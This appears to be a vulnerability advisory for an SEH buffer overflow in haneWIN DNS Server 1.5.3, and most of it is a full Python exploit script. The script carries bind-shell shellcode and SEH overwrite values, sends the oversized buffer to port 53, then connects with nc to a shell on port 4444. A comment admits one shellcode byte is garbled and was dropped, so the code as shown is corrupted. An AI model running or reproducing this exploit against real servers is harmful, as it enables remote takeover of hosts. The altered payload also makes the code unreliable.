Affected Systems:
Hanewin haneWIN DNS Server 1.5.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65287
haneWIN DNS Server is a DNS server for Windows.
haneWIN DNS Server 1.5.3 and other versions contain an SEH (structured exception handler) overflow that is triggered when the server processes an oversized request. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.
<* Source: Dario Estrada *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
#!/usr/bin/python
# Exploit Title: haneWIN DNS Server (SEH)
# Author: Dario Estrada (dash) https://intrusionlabs.org
# Date: 2014-01-29
# Version: haneWIN DNS Server 1.5.3
# Vendor Homepage: http://www.hanewin.net/
# Vulnerable app link: http://www.hanewin.net/dns-e.htm
# Tested on: Windows XP SP3
# Thanks to God, to my family and all my friends for always being there
#
# Description:
# A SEH overflow occurs when a large amount of data is sent to the server
#
import socket, sys, os, time

usage = "\nUsage: " + sys.argv[0] + " <host>"
if len(sys.argv) < 2:
    print usage
    sys.exit(0)
host = sys.argv[1]

shellcode = (
    # msfpayload windows/shell_bind_tcp R | msfencode -t c -b '\x00\xff\x0a\x0d'
    "\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
    "\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf"
    "\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55"
    "\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92"
    "\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d"
    "\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46"
    # NOTE: the 15th byte of the next line is garbled in the source ("cross city")
    # and cannot be recovered; it is omitted here, so the line carries 14 bytes
    "\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea"
    "\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8"
    "\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb"
    "\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35"
    "\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90"
    "\xe0\x2a\xdb\xc5\x93\xb4\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76"
    "\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7"
    "\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6"
    "\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43"
    "\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77"
    "\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0"
    "\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32"
    "\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf"
    "\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50"
    "\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b"
    "\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05"
    "\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4"
    "\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef"
    "\x39\x64\x5f\x9a\x3d\xdb\x60\x8f"
)

nSEH = '\xeb\x06\x90\x90'       # next-SEH slot: short jmp over the handler pointer
SEH = '\xd1\x07\xfc\x7f'        # SEH handler overwrite, address as given by the author
opcode = "\xe9\xdf\xf6\xff"     # jmp back into the buffer, as given by the author
junk = 'A' * (2324 - len(shellcode))
padding = 'A' * 600
buff = shellcode + junk + nSEH + SEH + opcode + padding

print "[+] Connecting to %s:53" % (host)
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 53))
    aix = shellcode + 'A' * (2324 - len(shellcode))   # present but unused in the original
    print "[*] Sending payload.. " + "shellcode: " + str(len(shellcode))
    s.send(buff)
    print "[*] Exploit Sent Successfully!"
    s.close()
    print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444\r"
    time.sleep(5)
    os.system("nc -n " + host + " 4444")
except socket.error:
    print "[!] Could not connect to " + host + ":53\r"
    sys.exit(0)
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Hanewin
-------
At the time of writing, the vendor has not released a patch or upgrade. Users of the software are advised to watch the vendor's homepage for the latest version:
http://www.hanewin.net/dns-e.htm